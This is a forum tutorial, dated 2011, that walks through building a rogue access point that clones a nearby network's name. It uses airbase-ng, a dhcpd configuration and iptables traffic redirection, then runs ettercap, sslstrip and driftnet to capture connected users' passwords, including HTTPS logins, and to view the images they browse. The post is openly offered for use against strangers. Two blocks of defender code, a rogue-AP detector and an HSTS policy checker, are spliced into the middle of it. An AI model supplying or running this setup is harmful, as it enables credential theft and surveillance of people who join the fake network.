ADVANCED PASSWORD SNIFFING (NOOB FRIENDLY): rogue AP + ettercap + sslstrip + driftnet (no additional router required) 06-22-2011, 08:58 AM
Hello friends. This is my first tutorial on advanced password sniffing.
This tutorial is based on creating a rogue AP (access point).
NOTE: THIS IS NOT ORDINARY AP SNIFFING. YOU CAN SNIFF HTTPS PASSWORDS AND ALL KINDS OF PASSWORDS, SO FOLLOW THIS TUTORIAL TILL THE END.
So...
1) THINGS YOU NEED
a) The ESSID of any network surrounding you. Make sure many users connect to it.
b) Operating system: BT4, Ubuntu or other Linux distributions.
c) Two working network interfaces: a wireless one and an Ethernet connection (with internet would be great).
2) TOOLS REQUIRED
Aircrack-ng
SSLstrip
Ettercap / Ettercap-GTK and Ettercap-Common
and Driftnet; this one is not necessary, but would be great if it works properly.
3) NOW INSTALLING THESE
open terminal window
sudo apt-get install aircrack-ng
sudo apt-get install driftnet
sudo apt-get install ettercap
or, for the GUI:
sudo apt-get install ettercap-gtk
For sslstrip, do the following. In the terminal type:
cd Documents
wget http://www.thoughtcrime.org/software/ssl...0.9.tar.gz
tar zxvf sslstrip-0.9.tar.gz
cd sslstrip-0.9
sudo python ./setup.py install
That's it, you're done with the installation.
Now it's time to configure your dhcpd.conf file. This is the DHCP server configuration: besides the addresses handed out to clients, it contains the nameserver they are given, and you need to put your own DNS in it.
NOW OPEN GEDIT AND PASTE THIS:
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers [ADD YOUR DNS HERE, REMOVE BRACKETS];
range 192.168.2.130 192.168.2.140;
}
*** ADD YOUR DNS IN THE BRACKETS, DON'T FORGET IT ***
Save this as dhcpd.conf on your desktop (the dhcpd3 command further down must point at wherever you saved it).
Now time to sniff :thumbs:
In the terminal, become root by typing: sudo su
Now:
airmon-ng start wlan0
and look at the result. Note on which interface monitor mode was enabled; generally it's mon0.
To give our AP a name we use airbase-ng (part of the aircrack-ng suite); we will be making an unsecured AP called 'VOLSBB'. mon0 is my ALFA card in monitor mode and can be substituted with whatever device name you have, but it must be a device that supports packet injection, in monitor mode!
airbase-ng -e VOLSBB mon0
So we have an ESSID; let's add the netmask and gateway. [at0 is the virtual Ethernet (tap) device that airbase-ng creates; maybe yours is eth0]:
ifconfig at0 up
ifconfig at0 192.168.2.129 netmask 255.255.255.128
route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
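From the defender's side, the airbase-ng step above is what a wireless IDS has to catch: a second transmitter advertising an ESSID you manage, usually with an unknown BSSID and no encryption. The following script is an added example and is not code from the original post or from the aircrack-ng project. It assumes you keep an inventory of authorised BSSIDs per ESSID and that scan results (for example from `iw dev wlan0 scan`) have already been parsed into records; the inventory and the scan records below are constructed sample data.

```python
"""Flag evil-twin style rogue access points from beacon observations.

Added example (not part of the original post). Assumes a defender-side
inventory of authorised BSSIDs per ESSID; all data below is constructed.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Beacon:
    essid: str
    bssid: str
    channel: int
    security: str  # "OPEN", "WPA2", ...


# Constructed inventory: the BSSIDs the organisation actually operates.
AUTHORISED = {
    "VOLSBB": {"00:11:22:33:44:55", "00:11:22:33:44:66"},
}

# Constructed scan: the last record looks like a soft AP cloning the
# managed ESSID with an unknown BSSID and no encryption.
SAMPLE_SCAN = [
    Beacon("VOLSBB", "00:11:22:33:44:55", 1, "WPA2"),
    Beacon("VOLSBB", "00:11:22:33:44:66", 6, "WPA2"),
    Beacon("Guest", "aa:bb:cc:dd:ee:01", 11, "OPEN"),
    Beacon("VOLSBB", "de:ad:be:ef:00:01", 11, "OPEN"),
]


def find_rogue_aps(scan, authorised):
    """Return a list of (beacon, reasons) for suspicious beacons.

    A beacon is flagged when its ESSID is one we manage but its BSSID is
    not in the inventory, or when it advertises an open network while the
    authorised APs for that ESSID are encrypted.
    """
    by_essid = defaultdict(list)
    for b in scan:
        by_essid[b.essid].append(b)

    findings = []
    for essid, beacons in by_essid.items():
        known = authorised.get(essid)
        if known is None:
            continue  # not a network we manage; nothing to compare against
        # Security modes seen on the APs we know to be ours.
        expected_sec = {b.security for b in beacons if b.bssid in known}
        for b in beacons:
            reasons = []
            if b.bssid not in known:
                reasons.append("unknown BSSID for managed ESSID")
            if b.security == "OPEN" and expected_sec and "OPEN" not in expected_sec:
                reasons.append("open network cloning an encrypted ESSID")
            if reasons:
                findings.append((b, reasons))
    return findings


if __name__ == "__main__":
    for beacon, reasons in find_rogue_aps(SAMPLE_SCAN, AUTHORISED):
        print(f"{beacon.essid} {beacon.bssid} ch{beacon.channel} "
              f"{beacon.security}: {', '.join(reasons)}")
```

The inventory check is only as good as the BSSID it relies on: a clone that also spoofs a legitimate BSSID passes it, so in practice you correlate with channel, signal strength and the physical location of the real AP as well.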
We need to make sure that connections to the network are assigned IP addresses so we point the dhcpd3 server to our new config file.
mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
You may get an error saying that dhcpd is not a valid user. Go to 'Users and Groups' in your start menu, add a group called 'dhcpd', then try again.
echo > '/var/lib/dhcp3/dhcpd.leases'
[Change /home/Semtex-Primed/Documents/ to the path of your file.]
dhcpd3 -d -f -cf /home/Semtex-Primed/Documents/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0
Now, to make sure that people connecting to our network can still reach the internet, we need to make sure traffic is routed properly while the server is running. They need to be online on our network, otherwise we're not sniffing any passwords!
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
For the part below you need to make sure your 2nd interface [the non-sniffing one] is connected to the net, and swap 'wlan1' for it below.
iptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
The next command needs changing: make sure 192.168.1.254 is changed to the default gateway of the network you're using!
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.254
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
Sniffing!
Now we have a perfectly usable software AP that can connect to the internet. This is a long process to go through but the rewards are huge. We have successfully set the AP up and now just need a way of monitoring it using Ettercap. We will be using Driftnet and SSLstrip too.
Setup IP forwarding:
echo 1 > /proc/sys/net/ipv4/ip_forward
I will assume you have Ettercap set up or know how to set it up. The command below starts it monitoring the at0 interface. -T means text interface within the terminal, -q means quiet mode, -p makes sure it's not in promiscuous mode and -i tells Ettercap which interface to monitor.
ettercap -T -q -p -i at0 // //
Next we will set up SSLstrip, which means that if the 'victim' logs into an SSL login page we will still get the passwords. Examples include PayPal, YouTube, Facebook, etc.
Open a new Terminal and type:
sslstrip -a -k -f
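The reason sslstrip can work at all is that the client's first request to a site goes out as plain HTTP and the proxy rewrites the https:// links it sees in the responses. A browser that already holds a cached Strict-Transport-Security (HSTS) policy for the host refuses to send that plaintext request, and hosts on the browser preload list are protected even on the first visit. The script below is an added example, not code from the original post or from the sslstrip project: it parses HSTS header values and classifies how much downgrade protection each host gives. The hostnames and header values are constructed sample data; the preload requirements it checks (max-age of at least one year, includeSubDomains, preload) are the published hstspreload.org criteria.

```python
"""Classify a site's HSTS policy by the downgrade protection it gives.

Added example (not part of the original post). Header values below are
constructed; replace them with the Strict-Transport-Security header your
own sites return.
"""
import re

ONE_YEAR = 31536000  # seconds; minimum max-age for the preload list

# Constructed sample responses: hostname -> Strict-Transport-Security
# header value (None when the header is absent).
SAMPLE_HEADERS = {
    "bank.example": "max-age=63072000; includeSubDomains; preload",
    "shop.example": "max-age=300",
    "blog.example": None,
    "mail.example": "max-age=31536000; includeSubDomains",
}


def parse_hsts(value):
    """Parse an HSTS header value into a dict of directives.

    Returns None for a missing or unparseable header. Directive names are
    case-insensitive; max-age must be present and a non-negative integer.
    """
    if value is None:
        return None
    directives = {}
    for part in value.split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, val = part.partition("=")
        directives[name.strip().lower()] = val.strip().strip('"')
    if not re.fullmatch(r"\d+", directives.get("max-age", "")):
        return None
    directives["max-age"] = int(directives["max-age"])
    return directives


def assess_hsts(value):
    """Return one of:

    "none"        no usable policy; any plaintext request can be stripped.
    "cached"      returning visitors are protected while the cached policy
                  (max-age seconds) is valid; the first visit is exposed.
    "preloadable" meets the preload-list requirements, so browsers that
                  ship the list protect even the first visit.
    """
    d = parse_hsts(value)
    if d is None or d["max-age"] == 0:
        return "none"
    if d["max-age"] >= ONE_YEAR and "includesubdomains" in d and "preload" in d:
        return "preloadable"
    return "cached"


def audit(headers):
    """Map each host to its assess_hsts() verdict."""
    return {host: assess_hsts(v) for host, v in headers.items()}


if __name__ == "__main__":
    for host, verdict in audit(SAMPLE_HEADERS).items():
        print(f"{host:15} {verdict}")
```

A "cached" verdict with a short max-age (shop.example above keeps the policy for only five minutes) is barely better than none, since the policy expires between visits; the usual recommendation is a one-year max-age followed by submission to the preload list.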
Now the cool stuff: Driftnet. This tool will display pictures/video stills of what the person is looking at online! Great little tool!
Open up a 3rd 'sniffing terminal' and type:
driftnet -v -i at0
-v = verbose mode
-i = interface to monitor on.
Congrats!!! You're done. All you need now is another person connecting to your AP!!!!! :thumbs:
FEEL FREE TO ASK ANYTHING RELATED TO THIS